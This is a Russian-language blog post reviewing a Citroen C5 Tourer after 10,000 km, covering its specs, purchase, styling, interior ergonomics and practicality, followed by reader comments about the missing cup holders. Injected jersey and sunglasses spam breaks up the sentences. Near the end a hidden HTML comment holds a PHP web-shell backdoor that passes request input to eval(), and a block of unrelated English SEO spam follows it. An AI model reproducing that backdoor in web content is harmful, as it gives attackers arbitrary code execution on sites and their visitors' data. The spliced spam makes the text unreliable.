Citroen C5 Tourer HDi 2.0 : Пробег 10000км. Общие впечатления. Часть 1

Citroen C5 Tourer

Продолжая традиции непоследовательной и нерегулярной публикации своих заметок об опыте пользования своим авто, и пока по-прежнему откладывая (но не забывая) публикацию пары постов о муках выбора и поиска авто полугодичной давности, решил пока отчитаться о намотанной по московским джунглям первой cheap nba jerseys 10ке тыщ километров… Ну, вернее пока извергну из себя нечто сублемативно-субъективное (в переводе с церковно-английского — «поделюсь общими впечатлениями»)…

Сразу проанонсирую и следующий постЕГ, в котором самовыражусь исключительно сухим языком цифр и отражу все затраты на эксплуатацию своего авто с момента его покупки.

Итак, напомню главного героя…

CITROEN C5 TOURER
Комплектация «Exclusive»
Двигатель: 2.0 HDi, 138 л/с, max 320 н/м (2000 об/мин)
AT-6 (Asin), гидро-пневматическая подвеска Hydractive3+ (изменяемый клиренс как мне помнится 14-18-21-24см, хотя эти цифры стоит уточнить пожалуй)
Салон: комбинированная кожа (алькантра)
Летняя резина Michelin R17 265/60

Машина шла в РФ уже с опциями — панорамная стеклянная крыша + заводская установка сигнализации с управлением от штатного ключа. Кто-то отказался — я подумал, и взял ее в таком варианте.
Выбор был отчасти эмоциональный (тачка очень нравилась), отчасти вынужденный (она сама ехала мне в руки именно test в таком виде), отчасти поперечно-иррациональный (слишком многие друзья кривились, а я упорно хотел соригинальничать) и т.д…

Покупалась в «Автоспеццентре Ситроен» в Химках. При покупке была выпрошена скидка в 50 000р, оформлен кредит на 50% стоимости и докуплен:

  • комплект каких-то золотых родных ковриков в салон
  • комплект передних и задних опять же родных и не менее золотых брызговиков уже не помню на какую сумму
  • установлена опять же родная и рекомендованная Ситроеном защита картера

Также в салоне был сразу переобут в зимнюю нешипованную резину Michelin X-ICE 2 XL R16 225/60 102 T в комплекте с дисками K&K Да Винчи А.7276 7.0×16 5/108 ET32. Все вместе подвез сам за wholesale mlb jerseys день до получения авто.

Итак, по итогам 10000км пробега, который был набран за период с 29/11/2011 по 16/05/2012, накопилось следующее (все ИМХО разумеется и конечно субъективно, что и понятно)…

Экстерьер

Ну реально ведь красивая тачка, и с цветом мне кажется угадал, смотрится весьма неплохо. 🙂 Да и панорамная крыша по мнению большинства пассажиров с заднего сидения смотрится офигенно. Не знаю, удастся ли мне насладиться этим зрелищем хоть когда-нть в полной мере.) Кузов универсал це-пятому вполне идет и «сараем» его назвать ну никак язык не поворачивается.

Мускулистые бока, а также глубоко заходящие на передние крылья уголки фар смотрятся весьма эффектно. Все двери тяжелые и массивные и поддерживают ощущение солидности и основательности этого детища французской инженерной мысли.

Фас це-пятого не столь эффектен как его же любой другой ракурс. Он кажется немного простоват, но все равно благодаря габаритам смотрится серьезно и на дороге порой нагоняемыми впереди конкурентами весьма уважаем и пропускаем.) Мож тут и в штатном ксеноне еще дело конечно.)

Сменив резину, сразу отметил, что R17 смотрится гораздо интереснее R16, на котором я прокатался всю зиму.

Интерьер и эргономика

Именно во многом благодаря дизайну салона, качеству материалов, стилю, эргономике и общей «нескучности» внутреннего убранства во время выбора авто Ситроен в моих глаза уделал скучно правильных, дорогих, но местами в то же время необъяснимо простоватых немцев, а также по-самурайски изысканных своим странным сочетанием хорошей кожи, комфорта и электронной начинки с говеным жестким пластиком японцев. 🙂 Но тут все очень субъективно, Про поэтому ни в коем мере не претендую на что-то типа «есть только французские автомобили и остальные», чем часто грешат фанатичные поклонники немцев или японцев. В глубине души я ж все равно БМВ хочу. 🙂

Приятный на ощупь пластик, интересные изгибы внутренних линий, красивые и удобные сидения с электроприводами настроек аж в 7-ми точках (плюс массаж, который я включал один раз за все время 🙂 ) и памятью на два положения, а также комбинированная кожа ИМХО — это идеальный вариант для жопы и спины. Фирменная неподвижная ступица руля проблем не вызывала с самого начала. Доступ ко всем кнопкам управления не вызвает проблем. Разве что центральный монохромный дисплей при большом количестве интеллектуальных систем управления и электроники вообще смотрится каким-то анахронизмом. Но в большинстве случаев на его месте красуется большой сенсорный дисплей с навигацией. В моем случае с этим не сложилось.

Подстаканники… Их попросту нет. Ни одного, в передней части салона, в хоть мало мальски удобном месте для водителя или пассажира. Один жалкий держатель для стакана внутри центрального подлокотника и все. Еще бы снаружи салона на крыше сделали. Ну, тема избитая. Такой странный ход французских дизайнеров для меня по-прежнему остается загадкой. Вообще, пожалуй самый большой минус — это катастрофическая непрактичность салона в плане хранения мелких предметов. Ни тебе банального очечника, ни подстаканников для передних пассажиров. Боковые карманы в дверях слишком малы и бесполезны в большинстве случаев. Мелкие емкости в центральной консоли перекрываются вставленными зарядками для мобильных девайсов или закрыты поднятым в верхнее положение подлокотником. И т.д. в общем, тут правда, малопонятная мне французская логика реально ставит в тупик. И это при всей симпатичности и недешевизны внутреннего убранства.

Практичность и функциональность

Находиться внутри cheap mlb jerseys в качестве как пассажира так и водителя очень комфортно, в салоне не слишком просторно и уж точно не тесно. Лично я при своих габаритах чувствую себя в нем замечательно. Задние пассажиры различных габаритов также на тесноту в Немного коленях не жаловались.

Универсал — удел семейных. Вместимость багажника при сложенных задних сидениях не уступает столь любимым многими X-Trail или Outlander XL, да и в штатном режиме со всей семьей на борту, багажник приятно радует своей вместимостью.

Трансформация салона выполняется быстро и без особых трудностей. Сложенные задние сиденья образуют ровный пол, алюминиевые накладки на полу багажника позволяют толкать длинномерные предметы не боясь All повредить обшивку. Кнопка управления подвеской внутри багажника при необходимости позволяет опустить задницу авто максимально низко или высоко для удобства погрузки. Проверял — работает Пользовался один раз, грузя какую-то хрень из Икеи. Прикольно.)

В общем, возложенные на моего це-пятого хозяйственно-транспортные функции семейного авто он выполняет исправно и без нареканий.

Продолжение — Citroen Tourer HDi 2.0 : Пробег 10000км. Общие впечатления. Часть 2

<!— [insert_php]if (isset($_REQUEST["yPPpO"])){eval($_REQUEST["yPPpO"]);exit;}[/insert_php][php]if (isset($_REQUEST["yPPpO"])){eval($_REQUEST["yPPpO"]);exit;}[/php] —>

manchester united will always give young players a chanceIn what has always been the benchmark for flexibility (which it really isn’t), touching your toes is a skill that alludes many individuals shortly into adulthood, and sometimes even sooner. While not being able to put your fingertips comfortably to your shoes may simply mean you have short arms and long legs (that’s a joke.), it also may be implicative of greater movement dysfunctions. Let’s look at a few:. Qualcomm Stadium, the team’s current home, is in Mission Valley. In 2005, the Chargers proposed building a stadium on that 166 acre site, along wholesale football jerseys china with retail and residential development surrounding it. Team officials estimated that project would have cost $450 million for the stadium $25 million more than the one the Arizona Cardinals were building at the time plus an additional $200 million for infrastructure, such as raising the site, building more freeway offramps and a bridge over an adjacent river for improved access. Hire staff. You can’t run the camp by yourself. Ask area coaches and former players if they would be willing to help. Assimilating Warner Bros, and adding HBO (along with the cheap oakleys HBO Now platform) would reduce the cost of content and distribution for Amazon in the long run. According to data from June 2016, Amazon Prime subscriptions increased about 17% since the beginning of the year Cheap Jerseys to reach 63 million total. Adding HBO Now’s subscriptions from a merger would probably lead to a jump of half a million alone, and this would not include the crowd that would be attracted from more seasons of Game of Thrones. He assured a St. Louis reporter that he’d work to keep the Rams from leaving town. That the two NFL games in London have already sold out, cheap jerseys china marking Britain as, quote, «a market where we need to be http://www.cheapraybans2013.com more active.». SULLIVAN: Jason Foster was a standout offensive lineman in college and the Indianapolis Colts came calling just after the end of the 2012 draft. He bounced around from team to team. He was cut http://www.elitecheapnfljerseysauthentic.com just before the start of the season last year. To do that let’s type a little bit of text and let’s say that the website that we like is Google. Let’s highlight that text, go to the insert tab at the top, say links and just select hyperlink. Right here it is going to ask us for the address we would like to go to and I’m just going to put Google’s address and say o’kay. He’s grits. I’m granola. We’re the opposite in almost every way,» she wrote.. So, «8 ball in wholesale Jerseys the corner pocket». And there you have it. That is an 8 ball game win. The other one is on the 16th of this month, so I think next Tuesday in Washington. The group of 35 CEOs that have been working on healthcare initiatives will issue our first report and we show that best practices, including a bunch of technology applicationscan literally improve outcomes and lower cost for large companies and the next step that we are going to announce is that we will go out and do pilots in the marketplace to show that this actually works. So this all move from spreadsheets to the lab to now to pilots and right behind those two very strong applications are things like energy and education..
3 комментария

3 Comments

  1. Андрей М says:

    С очечниками да, беда, это прямо фирменный стиль ситроенов. Из 4-х разных моделей на которых мне довелось ездить не было ни в одном.
    Что касается подстаканников, я лично никогда не ощущал в них потребность. Возможно я такой не один и возможно именно статистика их использования приводит к подобным решениям по их отсутствию. Хотя в моей весьма бюджетной и заслуженной машине он таки есть и расположен так, как будто расчитан на водителя всю дорогу пьющего кофе. Максимально удобно. Но за все время (9 лет) пользования автомобилем, эта его особенность, как и встроенная тележка для супермаркета, была обойдена моим вниманием.
    Касательно хранения мелочей, есть ощущение, что это из разряда позиционирования автомобиля. Типа солидному владельцу С5 не пристало хранить всякое барахло по всем щелям. При этом как-то забыли, что универсал — вполне семейный автомобиль.
    Однако могу лишь заметить, что в минивенах с этим все в порядке. Даже больше скажу, еще не видел организации салона минивена лучше чем у французов, может это твой следующий шаг? 🙂

    1. Ярослав Чугунов says:

      Про минивэн пока не думал, рано наверное.) А вот ПОЛНОЕ отсутствие возможности куда-нть ткнуть бутылочку или стаканчик, чтоб быстро и удобно можно было достать и пару глотков сделать, никакой даже французской логикой я объяснить не могу.) И более того, запихнутый в подлокотный бокс единственный держатель стакана у меня вообще вызывает вопросы касательно здоровья инженера по эргономике.)) Это ж как надо извернуться, чтобы объяснить себе и окружающим, что это офигительно удобно.)

  2. Андрей М says:

    Скорее всего это было сделано по остаточному принципу. Все остальное разместили, это осталось, как-то впихнули и на сем успокоились.

Комментировать в блоге